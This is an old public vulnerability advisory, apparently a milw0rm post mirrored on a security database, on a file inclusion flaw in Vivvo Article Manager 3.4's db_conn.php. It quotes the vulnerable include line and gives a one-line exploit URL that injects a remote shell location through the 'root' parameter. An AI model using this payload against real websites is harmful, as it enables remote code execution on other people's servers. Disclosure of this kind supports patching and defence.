Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16118
HistoryFeb 20, 2007 - 12:00 a.m.

Vivvo Article Manager 3.4 (root) Local File Inclusion Vulnerability

2007-02-2000:00:00
vulners.com
11

===================================================================================================
Author: Snip0r
Script Name: Vivvo Article Manager v 3.4
Website: www.vivvo.net

Codesnippet of vulnerable script ("./include/db_conn.php"):

if (file_exists($ext_base_conf_file)) include_once($ext_base_conf_file);

Exploit:

http://victim.com/ [Vivvo Article Manager Path] / include / db_conn.php?root=[SHELL_URL]?

Greets fly out to: D-T-O, Blutkehle666,Chris,Doc,Legija0ne,Higgy,Anthra><,Basti and bi0

milw0rm.com [2007-02-16]